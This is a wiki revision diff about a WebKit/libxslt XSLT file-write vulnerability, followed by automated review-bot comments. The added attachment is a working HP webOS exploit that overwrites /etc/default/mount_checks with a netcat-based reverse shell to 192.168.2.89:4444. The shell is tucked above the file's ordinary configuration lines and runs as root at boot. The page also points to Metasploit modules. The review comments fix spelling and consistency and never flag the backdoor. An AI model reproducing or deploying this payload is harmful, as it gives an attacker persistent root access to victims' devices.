Changes for page Application_Webkit

Revision on 2012/01/13 23:57 compared with revision on 2012/01/14 00:08

- Page properties
- Content
... ... @@ -28,7 +28,7 @@ 28 28 29 29 PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability. 30 30 31 -== Exploits==31 +== Meatsploit == 32 32 33 33 Two modules are included in Metasploit : 34 34 ... ... @@ -35,7 +35,9 @@ 35 35 * a [[auxiliary>>http://www.metasploit.com/modules/auxiliary/server/webkit_xslt_dropper||rel="__blank"]] working on any non-sandboxed non-patched Webkit device 36 36 * an [[exploit>>http://www.metasploit.com/modules/exploit/windows/browser/safari_xslt_output||rel="__blank"]] plugin targeting Safari users with Admin privileges (because of the MOF trick) 37 37 38 - Anexploit forHP webOSis attached.This exploitdrops a backdoor executed with root privileges at boot time :38 +== HP webOS 3.x == 39 39 40 -* XML contains the payload : destination file name + file content. A reverse-shell based on netcat is added to the script 41 -* XSL reads the XML file and create the requested file on disk 40 +An exploit for HP webOS 3.x was developed. This exploit drops a backdoor which is later executed with root privileges at boot time. The exploit is composed of two files : 41 + 42 +* [[webos-root-backdoor.xml>>attach:webos-root-backdoor.xml]] contains the configurable data (name and content of the destination file) and a processing instruction trigger the XSLT code 43 +* [[webos-root-backdoor.xsl>>attach:webos-root-backdoor.xsl]] reads the XML file and create the requested file on disk. This version overwrites a script located in /etc/default/ with a version including a reverse-shell based on netcat
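Review bot: The renamed heading in the first hunk, `+== Meatsploit ==`, misspells Metasploit; the sentence right below it ("Two modules are included in Metasploit") and the module links use the correct spelling, so the heading should read `== Metasploit ==`.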
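Review bot: Two grammar slips in the new bullet list of the second hunk: "a processing instruction trigger the XSLT code" should be "a processing instruction triggers the XSLT code", and "reads the XML file and create the requested file on disk" should be "reads the XML file and creates the requested file on disk". The attachment links themselves (`attach:webos-root-backdoor.xml`, `attach:webos-root-backdoor.xsl`) look consistent with the files being added.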
- webos-root-backdoor.xml
- Author
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,0 +1,1 @@ 1 +1.7 KB - Content
... ... @@ -1,0 +1,54 @@ 1 +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> 2 +<?xml-stylesheet type="text/xsl" href="xslt2root.xsl"?> 3 +<exploit><location>/etc/default/mount_checks</location><content><![CDATA[# -*- mode: conf; -*- 4 + 5 +# Backdoor, by Nicolas Gregoire / Agarri 6 +IP="192.168.2.89" 7 +PORT="4444" 8 + 9 +MKNOD="/bin/mknod" 10 +NC="/usr/bin/nc" 11 +FIFO="/tmp/.a" 12 + 13 +( $MKNOD $FIFO p; while true; do { sleep 1; $NC $IP $PORT < $FIFO | /bin/sh &> $FIFO ; } done ; rm $FIFO ) & 14 +# End backdoor 15 + 16 + 17 +# Set this to save a file across reboots to indictate on boot that 18 +# umount happened correctly (and that, e.g. battery wasn't pulled) 19 +MOUNT_STAMP=/var/umount.stamp 20 +# tags used in MOUNT_STAMP 21 +REASON_MARK=reason 22 +CLEAN_UMOUNT_MARK=date 23 + 24 +# name of system property holding true/false based on presence of 25 +# $MOUNT_STAMP. Ignored if MOUNT_STAMP not set; must be defined 26 +# otherwise 27 +MOUNT_PROPERTY=last_umount_clean 28 + 29 +# file that contains 1 if / should be remounted rw, 0 otherwise 30 +REMOUNT_TOKEN="/etc/.rootfs_RW" 31 + 32 +# If an fsck or reformat of /media/internal was required on boot, set 33 +# this property. 34 +MEDIA_FIX_PROPERTY=media_fixed_how 35 + 36 +WIPE_FLAGS_DIR=/var/.flags 37 +WIPE_FLAGS_FILE=$WIPE_FLAGS_DIR/on_mount 38 +WIPE_PROGRESS=/var/.sought_blocks 39 + 40 +# MMC_PROTECT_OPTS=-f 41 +MMC_PROTECT_OPTS="" 42 +MMC_PROTECT_DISABLED=1 43 +mmc_boot_update() { 44 + if which mmc_protect >/dev/null && test -z "$MMC_PROTECT_DISABLED" ; then 45 + BOOT_DEV=$(sed 's,.*root=\(/dev/[^ ]*\) .*,\1,' < /proc/cmdline) 46 + ON_OFF=1 # on by default 47 + if [ -f "$REMOUNT_TOKEN" -a "$(cat $REMOUNT_TOKEN)" = "1" ]; then 48 + ON_OFF=0 49 + fi 50 + mmc_protect $MMC_PROTECT_OPTS -D "$BOOT_DEV" -p $ON_OFF 51 + fi 52 +} 53 +]]></content></exploit> 54 +
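Review bot: The stylesheet reference in line 2 of the attachment, `<?xml-stylesheet type="text/xsl" href="xslt2root.xsl"?>`, does not match the companion file named in the page content hunk (`webos-root-backdoor.xsl`); either the href or the page text should be changed so the two attachments are described consistently. The page text also calls the XML file the "configurable data", so the hard-coded `IP="192.168.2.89"` and `PORT="4444"` in the embedded script should be marked in a comment as lab placeholder values rather than left looking like part of the original `/etc/default/mount_checks` configuration that follows them.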